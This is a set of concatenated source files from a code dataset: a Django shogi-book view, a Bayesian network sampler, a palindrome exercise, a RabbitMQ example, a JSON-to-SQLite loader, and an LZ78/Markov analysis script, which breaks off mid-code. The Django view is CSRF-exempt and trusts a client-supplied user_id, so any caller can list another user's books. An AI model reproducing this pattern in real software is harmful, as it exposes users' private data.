{"seq_id":"245382336","text":"import os, sys, json\nfrom django.shortcuts import render, redirect\nfrom django.http.response import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n# db\nfrom accounts.models.user import User\nfrom ShareShogi.models.book import Book\nfrom ShareShogi.models.chapter import Chapter\nfrom ShareShogi.models.scene import Scene\n\n# src\n\n\n@csrf_exempt\ndef get_user_books_request(request):\n\n    '''\n    Get the list of books belonging to a given user\n    '''\n\n    # get the user_id\n    if request.method == \"GET\":\n        user_id = int(request.user.id)\n\n    elif request.method == \"POST\":\n        payload = json.loads(request.body.decode(\"utf-8\"))\n        user_id = int(payload[\"user_id\"])\n\n    # fetch the book information\n    books = get_books(user_id)\n\n    result = {\n        \"code\" : 200,\n        \"result\": books\n    }\n\n    return JsonResponse(result)\n\n\ndef get_books(user_id):\n\n    '''\n    Get the list of books belonging to a given user\n    '''\n\n    record_User = User.objects.get(id=user_id)\n    queryset_Book = Book.objects.filter(user=record_User)\n\n    books = []\n\n    for record_Book in queryset_Book:\n\n        book_info = get_book_info(book_id=int(record_Book.id))\n        books.append(book_info)\n\n    books = books[::-1]\n\n    return books\n\n\ndef get_book_info(book_id):\n\n    '''\n    Get the information for a specific book\n\n    get_childs : if True, also include the info of every chapter in the book\n    '''\n\n    record_Book = Book.objects.get(id=book_id)\n\n    book_info = {\n        \"book_id\"       : book_id,\n        \"nickname\"      : record_Book.user.nickname,\n        \"title\"         : record_Book.title,\n        \"thumb_url\"     : record_Book.thumb_url,\n        \"is_public\"     : record_Book.is_public,\n        \"opening_sente\" : record_Book.opening_sente,\n        \"opening_gote\"  : record_Book.opening_gote,\n    }\n\n    return book_info","sub_path":"ShareShogi/src/contents/get/get_books.py","file_name":"get_books.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"9870003","text":"\"\"\"\n===========================================\nConvolutional Poisson Gamma Belief Network\n===========================================\n\n\"\"\"\n\n# Author: Jiawen Wu ; Chaojie Wang \n# License: Apache License Version 2.0\n\nimport numpy as np\nfrom pydpm.utils.Metric import *\n\n\n# GPU only\nclass CPGBN(object):\n\n    def __init__(self, K, device='gpu'):\n\n        self.K = K\n        #self.T = self.K.size\n        if device == 'gpu':\n            self.device = 'gpu'\n            from pydpm.utils import Model_Sampler_GPU\n            self.Multrnd_Matrix = Model_Sampler_GPU.Multrnd_Matrix_GPU\n            self.Crt_Matrix = Model_Sampler_GPU.Crt_Matrix_GPU\n            self.Crt_Multirnd_Matrix = Model_Sampler_GPU.Crt_Multirnd_Matrix_GPU\n            self.Conv_Multi_Matrix = Model_Sampler_GPU.conv_multi_sample\n        else:\n            raise 
Exception('device type error')\n\n\n def initial(self, data ,dtype=\"dense\"):\n\n # data: N*V*L\n if dtype == 'dense':\n self.batch_file_index, self.batch_rows, self.batch_cols = np.where(data)\n self.batch_value = data[self.batch_file_index, self.batch_rows, self.batch_cols]\n N, V, L = data.shape\n elif dtype == 'sparse':\n self.batch_file_index, self.batch_rows, self.batch_cols, self.batch_value = data[0]\n N, V, L = data[1]\n else:\n raise Exception('data type error')\n\n self.batch_len= L\n self.Setting = {}\n self.Setting['N_train'] = N\n # 1-th layer\n self.Setting['K1'] = self.K[0]\n self.Setting['K1_V1'] = V\n self.Setting['K1_V2'] = L + 2 # padding\n self.Setting['K1_S3'] = V\n self.Setting['K1_S4'] = 3\n self.Setting['K1_S1'] = self.Setting['K1_V1'] + 1 - self.Setting['K1_S3']\n self.Setting['K1_S2'] = self.Setting['K1_V2'] + 1 - self.Setting['K1_S4']\n # 2-th layer\n self.Setting['K2'] = self.K[1]\n self.Setting['K2_V1'] = self.Setting['K1_S1']\n self.Setting['K2_V2'] = self.Setting['K1_S2'] + 2 # padding\n self.Setting['K2_S3'] = 1\n self.Setting['K2_S4'] = 3\n self.Setting['K2_S1'] = self.Setting['K2_V1'] + 1 - self.Setting['K2_S3']\n self.Setting['K2_S2'] = self.Setting['K2_V2'] + 1 - self.Setting['K2_S4']\n # 3-th layer\n self.Setting['K3'] = self.K[2]\n self.Setting['K3_V1'] = self.Setting['K2_S1']\n self.Setting['K3_V2'] = self.Setting['K2_S2'] + 2 # padding\n self.Setting['K3_S3'] = 1\n self.Setting['K3_S4'] = 3\n self.Setting['K3_S1'] = self.Setting['K3_V1'] + 1 - self.Setting['K3_S3']\n self.Setting['K3_S2'] = self.Setting['K3_V2'] + 1 - self.Setting['K3_S4']\n\n # ======================= self.SuperParams =======================#\n self.SuperParams = {}\n self.SuperParams['gamma0'] = 0.1 # r\n self.SuperParams['c0'] = 0.1\n self.SuperParams['a0'] = 0.1 # p\n self.SuperParams['b0'] = 0.1\n self.SuperParams['e0'] = 0.1 # c\n self.SuperParams['f0'] = 0.1\n self.SuperParams['eta'] = 0.05 # Phi\n # ======================= self.Params =======================#\n self.Params = {}\n\n # 1-th layer\n self.Params['D1_k1'] = np.random.rand(self.Setting['K1'], self.Setting['K1_S3'], self.Setting['K1_S4'])\n for k1 in range(self.Setting['K1']):\n self.Params['D1_k1'][k1, :, :] = self.Params['D1_k1'][k1, :, :] / np.sum(self.Params['D1_k1'][k1, :, :])\n self.Params['W1_nk1'] = np.random.rand(self.Setting['N_train'], self.Setting['K1'], self.Setting['K1_S1'], self.Setting['K1_S2'])\n self.Params['W1_nk1_Pooling'] = np.sum(np.sum(self.Params['W1_nk1'], axis=3), axis=2)\n\n self.Params['c2_n'] = 1 * np.ones([self.Setting['N_train']])\n self.Params['p2_n'] = 1 / (1 + self.Params['c2_n'])\n\n # 2-th layer\n self.Params['Phi_2'] = 0.2 + 0.8 * np.random.rand(self.Setting['K1'], self.Setting['K2'])\n self.Params['Phi_2'] = self.Params['Phi_2'] / np.sum(self.Params['Phi_2'], axis=0)\n self.Params['Theta_2'] = np.random.rand(self.Setting['N_train'], self.Setting['K2'])\n\n self.Params['c3_n'] = 1 * np.ones([self.Setting['N_train']])\n tmp = -log_max(1 - self.Params['p2_n'])\n self.Params['p3_n'] = (tmp / (tmp + self.Params['c3_n'])) # pj_3 - pj_T+1\n\n # 3-th layer\n self.Params['Phi_3'] = 0.2 + 0.8 * np.random.rand(self.Setting['K2'], self.Setting['K3'])\n self.Params['Phi_3'] = self.Params['Phi_3'] / np.sum(self.Params['Phi_3'], axis=0)\n self.Params['Theta_3'] = np.random.rand(self.Setting['N_train'], self.Setting['K3'])\n\n self.Params['c4_n'] = 1 * np.ones([self.Setting['N_train']])\n tmp = -log_max(1 - self.Params['p3_n'])\n self.Params['p4_n'] = (tmp / (tmp + self.Params['c4_n'])) # 
pj_3 - pj_T+1\n\n self.Params['Gamma'] = np.ones([self.Setting['K3'], 1]) / self.Setting['K3']\n\n def train(self, iter_all=200):\n\n from scipy.special import gamma\n self.Setting['Burinin'] = 0.75 * iter_all\n self.Setting['Collection'] = iter_all - self.Setting['Burinin']\n\n # Collection\n W_train_1 = np.zeros([self.Setting['N_train'], self.Setting['K1']])\n W_train_2 = np.zeros([self.Setting['N_train'], self.Setting['K2']])\n W_train_3 = np.zeros([self.Setting['N_train'], self.Setting['K3']])\n\n import time\n Iter_time = []\n Iter_lh = []\n\n # ========================== Gibbs ==========================#\n for t in range(iter_all):\n\n start_time = time.time()\n\n # ========================== 1st layer Augmentation ==========================#\n self.Params['D1_k1_Aug'] = np.zeros_like(self.Params['D1_k1']) # Augmentation on D \n self.Params['W1_nk1_Aug'] = np.zeros_like(self.Params['W1_nk1']) # Augmentation on w\n\n\n W1_nk1 = np.array(self.Params['W1_nk1'], dtype='float32', order='C')\n D1_k1 = np.array(self.Params['D1_k1'], dtype='float32', order='C')\n\n W1_nk1_Aug, D1_k1_Aug = self.Conv_Multi_Matrix(self.batch_file_index, self.batch_rows, self.batch_cols, self.batch_value, W1_nk1, D1_k1, self.Setting)\n\n\n self.Params['W1_nk1_Aug'] = np.array(W1_nk1_Aug, dtype='float64') # N*K1*S1*S2\n self.Params['D1_k1_Aug'] = np.array(D1_k1_Aug, dtype='float64') # K1*S3*S4\n self.Params['W1_nk1_Aug_Pooling'] = np.sum(np.sum(self.Params['W1_nk1_Aug'], axis=3), axis=2) # N*K1\n\n # ========================== 2nd layer Augmentation ==========================#\n M1_tmp = np.array(np.transpose(np.round(self.Params['W1_nk1_Aug_Pooling'])), dtype='float64', order='C')\n Theta2_tmp = np.array(np.transpose(self.Params['Theta_2']), dtype='float64', order='C')\n Xt_to_t1_2, WSZS_2 = self.Crt_Multirnd_Matrix(M1_tmp, self.Params['Phi_2'], Theta2_tmp)\n\n # ========================== 3rd layer Augmentation ==========================#\n M2_tmp = np.array(np.round(Xt_to_t1_2), dtype='float64', order='C')\n Theta3_tmp = np.array(np.transpose(self.Params['Theta_3']), dtype='float64', order='C')\n Xt_to_t1_3, WSZS_3 = self.Crt_Multirnd_Matrix(M2_tmp, self.Params['Phi_3'], Theta3_tmp)\n\n # ====================== Parameters Update ======================#\n # Update D,Phi\n for k1 in range(self.Setting['K1']):\n X_k1_34 = self.Params['D1_k1_Aug'][k1, :, :]\n X_k1_34_tmp = np.random.gamma(X_k1_34 + self.SuperParams['eta'])\n D1_k1_s = X_k1_34_tmp / np.sum(X_k1_34_tmp)\n self.Params['D1_k1'][k1, :, :] = D1_k1_s\n\n Phi_2_tmp = np.random.gamma(WSZS_2 + self.SuperParams['eta'])\n self.Params['Phi_2'] = Phi_2_tmp / np.sum(Phi_2_tmp, axis=0)\n\n Phi_3_tmp = np.random.gamma(WSZS_3 + self.SuperParams['eta'])\n self.Params['Phi_3'] = Phi_3_tmp / np.sum(Phi_3_tmp, axis=0)\n\n # Update c_j,p_j\n self.Params['c2_n'] = np.random.gamma(\n self.SuperParams['e0'] + np.sum(np.dot(self.Params['Phi_2'], self.Params['Theta_2'].T), 0))\n self.Params['c2_n'] = self.Params['c2_n'] / (self.SuperParams['f0'] + np.sum(self.Params['W1_nk1_Pooling'], axis=1))\n self.Params['p2_n'] = 1 / (self.Params['c2_n'] + 1)\n\n self.Params['c3_n'] = np.random.gamma(\n self.SuperParams['e0'] + np.sum(np.dot(self.Params['Phi_3'], self.Params['Theta_3'].T), 0))\n self.Params['c3_n'] = self.Params['c3_n'] / (self.SuperParams['f0'] + np.sum(self.Params['Theta_2'], axis=1))\n tmp = -log_max(1 - self.Params['p2_n'])\n self.Params['p3_n'] = tmp / (self.Params['c3_n'] + tmp)\n\n self.Params['c4_n'] = np.random.gamma(self.SuperParams['e0'] + 
np.sum(self.Params['Gamma']))\n self.Params['c4_n'] = self.Params['c4_n'] / (self.SuperParams['f0'] + np.sum(self.Params['Theta_3'], axis=1))\n tmp = -log_max(1 - self.Params['p3_n'])\n self.Params['p4_n'] = tmp / (self.Params['c4_n'] + tmp)\n\n # Update w_j\n W_k3_sn = np.random.gamma(self.Params['Gamma'] + Xt_to_t1_3) / (\n -log_max(1 - self.Params['p3_n']) + self.Params['c4_n']) # V*N\n self.Params['Theta_3'] = np.transpose(W_k3_sn)\n\n shape2 = np.dot(self.Params['Phi_3'], self.Params['Theta_3'].T)\n W_k2_sn = np.random.gamma(shape2 + Xt_to_t1_2) / (-log_max(1 - self.Params['p2_n']) + self.Params['c3_n']) # V*N\n self.Params['Theta_2'] = np.transpose(W_k2_sn)\n\n shape1 = np.dot(self.Params['Phi_2'], self.Params['Theta_2'].T) # V*N\n W_k1_sn = np.random.gamma(shape1 + self.Params['W1_nk1_Aug_Pooling'].T) / (1 + self.Params['c2_n']) # V*N\n self.Params['W1_nk1_Pooling'] = np.transpose(W_k1_sn)\n\n for k1 in range(self.Setting['K1']):\n self.Params['W1_nk1'][:, k1, 0, :] = (self.Params['W1_nk1_Aug'][:, k1, 0, :] / (\n self.Params['W1_nk1_Aug_Pooling'][:, k1:k1 + 1] + 0.0001)) * self.Params['W1_nk1_Pooling'][:,\n k1:k1 + 1]\n\n if t >= self.Setting['Burinin']:\n W_train_1 = W_train_1 + np.sum(self.Params['W1_nk1'][:, :, 0, :], axis=2)\n W_train_2 = W_train_2 + self.Params['Theta_2']\n W_train_3 = W_train_3 + self.Params['Theta_3']\n\n end_time = time.time()\n\n if t == 0:\n Iter_time.append(end_time - start_time)\n else:\n Iter_time.append(end_time - start_time + Iter_time[-1])\n\n print(\"epoch \" + str(t) + \" takes \" + str(end_time - start_time) + \" seconds\")\n\n\n W_train_1 = W_train_1 / self.Setting['Collection']\n W_train_2 = W_train_2 / self.Setting['Collection']\n W_train_3 = W_train_3 / self.Setting['Collection']\n\n\n","sub_path":"pydpm/model/cpgbn.py","file_name":"cpgbn.py","file_ext":"py","file_size_in_byte":11044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"630836528","text":"'''\nhttps://www.interviewbit.com/problems/palindrome-list/\nPalindrome List\n\nGiven a singly linked list, determine if its a palindrome. 
Return 1 or 0 denoting if its a palindrome or not, respectively.\n\nNotes:\n\nExpected solution is linear in time and constant in space.\nFor example,\n\nList 1-->2-->1 is a palindrome.\nList 1-->2-->3 is not a palindrome.\n\n'''\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param A : head node of linked list\n # @return an integer\n def lPalin(self, A):\n if not A or not A.next:\n return 1\n size = 0\n c = A\n while c:\n size += 1\n c = c.next\n trav = int(size / 2) - 1\n i = 0\n p = None\n c = A\n n = c.next\n while i < trav:\n c.next = p\n p = c\n c = n\n n = n.next\n i += 1\n left = c\n right = c.next\n if size % 2 == 1:\n right = right.next\n left.next = p\n while left and right:\n if left.val != right.val:\n return 0\n else:\n left = left.next\n right = right.next\n return 1\n\n","sub_path":"palindrome_list.py","file_name":"palindrome_list.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"644448467","text":"#!/usr/bin/env python\n#https://www.rabbitmq.com/tutorials/tutorial-one-python.html\n#sudo pip install pika\n#https://pika.readthedocs.io/en/0.10.0/intro.html\n#http://github.com/rabbitmq/rabbitmq-tutorials/blob/master/python/send.py\n\nimport pika\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost')) #standard port (5672)\nchannel = connection.channel()\nchannel.queue_declare(queue='hello')\n\n# In RabbitMQ a message can never be sent directly to the queue, it always needs to go through an exchange.\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='Hello World!')\n\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='this is the 2nd message')\n\nchannel.basic_publish(exchange='',\n routing_key='hello',\n body='11/17/17 - this is the 3rd message')\n\nconnection.close()\n\nprint(\" [x] Message were sent\")\n","sub_path":"rabbitmq/src/main/python/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"498915711","text":"import json\nimport sqlite3\n\n__author__ = 'HaveF'\n\nJSON_FILE = \"etymonline_data.json\"\nDB_FILE = \"etymonline_data.db\"\n\ntraffic = json.load(open(JSON_FILE))\n\nwith sqlite3.connect(DB_FILE) as db:\n c = db.cursor()\n c.execute('''create table etymonline\n (no INT primary key,\n word TEXT,\n\t\t origin TEXT)''')\n query = \"insert into etymonline values (?,?,?)\"\n for idx,item in enumerate(traffic):\n word = item['word'][0]\n origin_list = item['origin']\n origin = u''\n for i in origin_list:\n origin = origin+i\n c.execute(query, [idx, word, origin])\n\n# Theoretically, these are not necessary.\nc.close()\ndb.commit()\ndb.close()\n","sub_path":"json2sqlite_only_etymonline_data.py","file_name":"json2sqlite_only_etymonline_data.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"195203922","text":"\"\"\"Plotting graphs and histogram_chains using data from LZ78 applied to Markov sources\n\nSimulation\n\n $ python main.py \n\n Plots the usual histogram_chains from the set of experiments in .\n\n $ python main.py -s \n\n Runs a simulation after prompting for three coupless (n_word, n_exp)\n and saves it as .\n\n $ python main.py -range \n\n Runs a simulation after prompting for a range of values 
ns\n and saves it as .\n\n $ python main.py -m --file \n\n Loads the set of experiments and plots the graphs related\n to mean analysis.\n\n $ python main.py -m --save \n\n Runs the analysis and then saves the data - with analysis - into\n the file .\n\n $ python main.py -v (--file | --save )\n\n Works the same as the -m argument previously seen, except that it\n does variance analysis and plots.\n\n $ python main.py -cdf (--file | --save )\n\n Works the same as the -m argument previously seen, except that it\n does cumulative distribution function analysis and plots.\n\n\n\"\"\"\n\nimport numpy as np # learn more: https://python.org/pypi/np\nfrom math import log\nfrom scipy.stats import norm\n\n# from scipy.stats import normaltest\nimport sys\nfrom szpan import var, h_2, entropy\nfrom markov import markov_chain, markov_source2\nfrom neininger import H, sigma2_H3\nfrom lempelziv import compress, compress2\n\nimport matplotlib.pyplot as plt\nfrom math import sqrt\nimport seaborn as sns\n\n# import pandas as pd\nfrom scipy import stats\nfrom eigenvalues import lambda_2, eigenvalue_std\n\nfrom progress.bar import Bar\n\nsns.set(color_codes=True)\nnp.random.seed(sum(map(ord, \"distributions\")))\n\nDEBUG = True\n\n# Failed attempt at speeding the simulation of words\n# def fast_word_generator(M, f, n, N):\n# \"Outputs N words of size n from M\"\n# probas = np.random.rand(N, n)\n# m00 = M[0, 0]\n# m10 = M[1, 0]\n# d = {0: m00, 1: m10}\n# words = [[f[int(probas[i, 0] > m00)]] for i in range(N)]\n\n# for j in range(1, n):\n# for i in range(N):\n# w = words[i][-1]\n# words[i].append(f[(w + int(probas[i, j] > d[w])) % 2])\n\n# input(\"Generated words\")\n# return words\n\n\ndef simulation(\n random_markov=True, filesave=\"experiment_data.npy\", length_values=None, n_exp=None\n):\n \"\"\"Generates words from a Markov source.\n \"\"\"\n\n # Taking care of the different interactive modes\n if length_values is None:\n i = 1000\n length_values = [10 * i, 50 * i, 100 * i]\n\n style_mode = False\n\n fast_mode = input(\n \"Do you want fast mode activated? 
Y/n/s (default = true, s = style_mode) \"\n )\n\n if fast_mode == \"n\":\n fast_mode = False\n\n elif fast_mode == \"s\":\n style_mode = True\n length_values = [500, 1000, 2000]\n n_exp = 100\n\n else:\n fast_mode = True\n print(\"\\nChoose words lengths:\\n\")\n length_values = [int(input(str(i) + \": \")) for i in range(3)]\n n_exp = int(input(\"Number of experiments\"))\n\n else:\n if n_exp is None:\n n_exp = int(input(\"Specifiy number of experiments\"))\n\n fast_mode = True\n style_mode = False\n\n # In case the Markov chain isn't randomized, this is the chain we'll use\n if not random_markov:\n p_a = 0.9\n M = np.matrix([[p_a, 1 - p_a], [1 - p_a, p_a]])\n h = -p_a * log(p_a, 2) - (1 - p_a) * log(1 - p_a, 2)\n f = [0, 1]\n\n else:\n N = 2\n M = markov_chain(N)\n h = entropy(M)\n f = [0, 1]\n print(\"Random markov has values\", M)\n\n # Some output for slow mode\n # if not fast_mode:\n # print(\"\\nUsing a random Markov chain of size \" + str(N))\n # input(M)\n # print(\"\\nIts state function f is:\")\n # input(f)\n # print(\"\\nIts entropy is:\")\n # input(h)\n # print(\"\\nIts h2 is:\")\n # input(h_2(M))\n # print(\"\\nh2-h^2 is:\")\n # input(h_2(M) - h ** 2)\n\n # Initializing the dictionaries used to store the experiments\n # Many keys are being used, such as \"h\" for entropy, \"M\" for\n # the chain, \"n_exp\", \"n_word\", etc.\n # The experiments are stored in this format in npy files.\n exps = [dict() for _ in range(len(length_values))]\n\n for i, n in enumerate(length_values):\n exp = exps[i]\n\n exp[\"h\"] = h\n exp[\"M\"] = M\n\n if not (fast_mode or style_mode):\n try:\n n = int(input(\"\\nChoose size of words to test (default %d) \" % n))\n except:\n n = n\n\n try:\n n_exp = int(\n input(\"\\nHow many experiments do I run? (default %d) \" % 200)\n )\n except:\n n_exp = 200\n\n print(\"\\nNow simulating words of size %d, doing %d experiments \" % (n, n_exp))\n exp[\"n_exp\"] = n_exp\n exp[\"n_word\"] = n\n\n # Runs LZ78 over n_exp samples of words of length n from\n # the Markov chain M\n # word_gen = word_generator(M, f, n)\n # l =[word_gen() for _ in range(n_exp)]\n # l = fast_word_generator(M,f,n,n_exp)\n # c = [compress2(w) for w in l]\n # m = [len(x) for x in c]\n bar = Bar(\"Processing\", max=n_exp)\n m = []\n for _ in range(n_exp):\n m.append(compress2(markov_source2(M, n)))\n bar.next()\n\n exp[\"data\"] = m\n\n exps[0][\"ns\"] = length_values\n print(\"\\nNow savings experiments to \" + filesave)\n np.save(filesave, exps)\n\n return exps, fast_mode\n\n\ndef data_analysis(\n exps=None,\n random_markov=True,\n datafile=None,\n filesave=\"experiment_data.npy\",\n length_values=None,\n n_exp=None,\n fast_mode=False,\n):\n\n # If no experiments were given as argument, start simulation.\n if exps is None:\n if datafile is None:\n if n_exp is None:\n n_exp = 500\n exps, fast_mode = simulation(\n random_markov=random_markov,\n filesave=filesave,\n length_values=length_values,\n n_exp=n_exp,\n )\n\n else:\n fast_mode = False\n exps = np.load(datafile)\n\n for exp in exps:\n n = exp[\"n_word\"]\n n_exp = exp[\"n_exp\"]\n h = exp[\"h\"]\n M = exp[\"M\"]\n\n print(\n \"\\n ===== This experiment has %d samples of words of size %d\" % (n_exp, n)\n )\n print(\"Using chain {}\".format(M))\n\n # Theoretical mean\n mean = h * n / log(n)\n # mean2 = H(M) * n / log(n, 2)\n # H(M) # à enlever\n\n # if not fast_mode:\n # input(\"\\nTheoretical mean is {}\".format(mean))\n exp[\"mean\"] = mean\n\n # Theoretical variances\n std_nein = sqrt(sigma2_H3(M) * n) / log(n, 2)\n # std_szpan = 
sqrt ( -(h_2(M) - (h**2)) * h**3 * n )\n # print(\"M is\", M)\n print(\"\\nNumber of experiments: \", n)\n # print(\"\\nValue for variance var(M)\", var(M, n))\n print(\"\\nValue of log(m): \", log(mean))\n # std_szpan = sqrt(abs(var(M, n)))\n std_szpan = eigenvalue_std(M, n) # computed with lambda\n std_eig = eigenvalue_std(M, n)\n exp[\"std_nein\"] = std_nein\n exp[\"std_szpan\"] = std_szpan\n\n print(\"\\nComputed std_szpan and std_nein: ({}, {})\".format(std_szpan, std_nein))\n\n # Normalized values from Nein and Szpan papers\n d_nein = [(m_n - mean) / std_nein for m_n in exp[\"data\"]]\n d_szpan = [(m_n - mean) / std_szpan for m_n in exp[\"data\"]]\n d_eig = [(m_n - mean) / std_eig for m_n in exp[\"data\"]]\n exp[\"d_nein\"] = d_nein\n exp[\"d_szpan\"] = d_szpan\n exp[\"d_eig\"] = d_eig\n\n # Empirical variance and mean\n # Samples corresponding to normal distribution p\n\n print(\"Showing the data\")\n\n mu, std = norm.fit(exp[\"data\"])\n exp[\"mu\"] = mu\n exp[\"std\"] = std\n\n if not fast_mode:\n print(\"\\nFitting mean and std are (mu=%f) and (sigma==%f)\" % (mu, std))\n\n # Empirical variance, theoretical mean\n # also theoretical mean and theoretical variance\n mi = min(exp[\"data\"])\n ma = max(exp[\"data\"])\n xmins = [(mi - me) / v for me in [mu, mean] for v in [std, std_nein, std_szpan]]\n xmaxs = [(ma - me) / v for me in [mu, mean] for v in [std, std_nein, std_szpan]]\n\n # 0 = mu (empirical mean) and std (empirical standard deviation)\n # 1 = mu and std_nein\n # 2 = mu and std_szpan\n # 3 = mean and std\n # 4 = mean and std_nein\n # 5 = mean and std_szpan\n for i in range(len(xmins)):\n xmin, xmax = xmins[i], xmaxs[i]\n x = np.linspace(xmin, xmax)\n p = stats.norm(0, 1).pdf(x)\n exp[\"x\" + str(i)] = x\n exp[\"p\" + str(i)] = p\n\n if datafile is not None:\n print(\"\\nNow savings data analysis to \" + datafile)\n np.save(datafile, exps)\n\n return exps\n\n\ndef data_loading(filesave=None, datafile=None):\n \"\"\"Loads experiments by either simulating them or loading them from memory.\n Analyses experiments that previously weren't\n \"\"\"\n\n if datafile is None:\n\n print(\"\\nChoose ns interval range(a, b, s)\")\n\n a = int(input(\"a = \"))\n b = int(input(\"b = \"))\n s = int(input(\"s = \"))\n ns = list(range(a, b, s))\n n_exp = int(input(\"\\nHow many experiments ? \"))\n\n exps = data_analysis(filesave=filesave, length_values=ns, n_exp=n_exp)\n\n else:\n\n print(\"Loading file \", datafile)\n\n exps = np.load(datafile)\n\n print(\"Analysing the experiments\")\n\n fast_mode = (\n False\n if input(\"Do you want to see the values? 
y/N (defaut is false) \").lower() == \"y\"\n else True\n )\n\n exps = data_analysis(exps=exps, datafile=datafile, fast_mode=fast_mode)\n\n try:\n ns = exps[0][\"ns\"]\n except:\n print(\"ns wasn't defined in exps, attempting to define it automatically\") # maybe something else\n ns = [exp['n_word'] for exp in exps]\n exps[0][\"ns\"] = ns\n\n if datafile:\n np.save(datafile, exps)\n\n return exps, ns\n\n\ndef analysing_theoretical_std(filesave=None, datafile=None, save=None, save_name=None):\n \"\"\"Computes graphs of theoretical standard deviation versus empirical ones.\n \"\"\"\n exps, ns = data_loading(filesave=filesave, datafile=datafile)\n n_exp = exps[0][\"n_exp\"]\n\n # N = 3\n stds = [exp[\"std\"] for exp in exps]\n # variances = [exp['std'] ** 2 for exp in exps]\n neins = [exp[\"std_nein\"] for exp in exps]\n szpans = [exp[\"std_szpan\"] for exp in exps]\n diff1 = [stds[i] - neins[i] for i in range(len(stds))]\n diff2 = [stds[i] - szpans[i] for i in range(len(stds))]\n \n al = 40 / (1000 * (sqrt(5) -1))\n be = 40 * (1 - (1 / (sqrt(5)-1) ))\n\n sqrt1 = [-(al * sqrt(n) + be) for n in ns]\n\n # fsts = [diff[40] - log(ns[40], 2) ** (0.5 + i*0.1 + 0.3) for i in range(N)]\n try:\n fst = diff1[10] - log(ns[10], 2)\n except:\n fst = diff1[0] - log(ns[0], 2)\n # logs = [[log(n, 2) ** (0.5 + i*0.1 + 0.3) + fsts[i] for n in ns] for i in range(N)]\n logs = [log(n, 2) + fst for n in ns]\n\n figs, axs = plt.subplots(1, 2, tight_layout=True)\n \n axs[0].plot(ns, stds, label=r\"$\\sigma$\")\n axs[0].plot(ns, neins, label=r\"$\\sigma_{Neininger}$\")\n axs[0].plot(ns, szpans, label=r\"$\\sigma_{Szpankowski}$\")\n\n axs[0].set_title(\n r\"Empirical standard deviation ($\\sigma$)\"\n + r\" and theoretical ones ($\\sigma_{Neininger}$, $\\sigma_{S}$), $n_{exp}$ = \"\n + str(n_exp)\n )\n\n axs[1].plot(ns, diff1, label=r\"$\\Delta \\sigma = \\sigma - \\sigma_{Neininger}$\")\n axs[1].plot(ns, diff2, label=r\"$\\Delta \\sigma = \\sigma - \\sigma_{Szpan}$\")\n\n # for i in range(N):\n # e = 0.5 + i*0.1 + 0.3\n # axs[1].plot(ns, logs[i], label=r'${(\\log_2(n))}^{%1.2f}-%1.2f$' % (e, -fsts[i]))\n\n # axs[1].plot(ns, sqrt1, label=r\"${-(\\alpha\\sqrt{n}+\\beta)}$\")\n axs[1].set_title(\n \"Difference between standard deviations, $n_{exp}$ = \" + str(n_exp)\n )\n\n import importlib\n\n for ax in axs:\n ax.set_xlabel(\"Word length n\")\n ax.legend()\n sns.reset_defaults()\n ax.plot(ns, np.zeros(len(ns)), 'b+', ms=10)\n importlib.reload(sns)\n ax.ticklabel_format(style='sci', axis='x', scilimits=(0,0))\n\n if save:\n print(\"Saving figure as \" + save_name)\n plt.savefig(save_name, dpi=\"figure\")\n\n\ndef analysing_theoretical_mean(filesave=None, datafile=None, save=None, save_name=None):\n r\"\"\"Computes graphs of theoretical means versus empirical ones.\n The goal is to identify a \\log n tendency\"\"\"\n exps, ns = data_loading(filesave=filesave, datafile=datafile)\n n_exp = exps[0][\"n_exp\"]\n\n mus = [exp[\"mu\"] for exp in exps]\n means = [exp[\"mean\"] for exp in exps]\n diff = [mus[i] - means[i] for i in range(len(mus))]\n # inv_diff = [1/d for d in diff]\n n_log2 = [n / log(n, 2) ** 2 for n in ns]\n n_log = [n / log(n, 2) for n in ns]\n # n_log32 = [n / log(n, 2)**(1.34) for n in ns]\n # logs = [log(n,2) for n in ns]\n div = [mus[i] / means[i] for i in range(len(mus))]\n # inv = [1/n for n in ns]\n # inv_logs = [1/x for x in logs]\n es = [0.01 * i for i in range(2, 8)]\n different_logs = [[n / log(n, 2) ** (1.30 + e) for n in ns] for e in es]\n # asympt = [diff[i] * sqrt(ns[i]) / log(ns[i], 2) for i in 
range(len(ns))]\n\n    figs, axs = plt.subplots(1, 3, tight_layout=True)\n\n    axs[0].plot(ns, mus, color=\"orange\", label=r\"$\\mu$\")\n    axs[0].plot(\n        ns,\n        means,\n        color=\"green\",\n        label=r\"$E_{\\text{th}} = \\frac{nh}{\\log_2(n)}$\",\n        linestyle=\"-\",\n    )\n    axs[0].set_title(r\"Empirical ($\\mu$) and theoretical mean ($E_{\\text{th}}$) plots\")\n\n    axs[1].plot(ns, n_log2, color=\"green\", label=r\"$\\frac{n}{\\log_2^2 n}$\")\n\n    # for (i,e) in enumerate(es):\n    #     axs[1].plot(ns, different_logs[i], label=r'$\\frac{n}{(\\log_2(n))^{' + str(1.30+e) + '}}$')\n\n    axs[1].plot(ns, diff, color=\"black\", label=r\"$\\Delta E$\", linestyle=\"-\")\n\n    axs[1].plot(ns, n_log, color=\"red\", label=r\"$\\frac{n}{\\log_2 n}$\")\n    axs[1].set_title(r\"Difference $\\Delta E = \\mu-E_{th}$, and approximations\")\n\n    # axs[2].plot(ns, div, color='blue', label=\"$(\\Delta E)^{-1}$\", linestyle=\"-\")\n    # axs[2].plot(ns, logs, color=\"green\", label=\"$\\log_2 n$\")\n    # axs[2].plot(ns, inv_logs, color=\"red\", label=r'$\\frac{1}{\\log_2 n}$')\n    # axs[2].set_title(\"Division $\\mu/mean$\")\n\n    # plot asympt rather than div, so the curve matches the label and the o(1) check in the title\n    axs[2].plot(\n   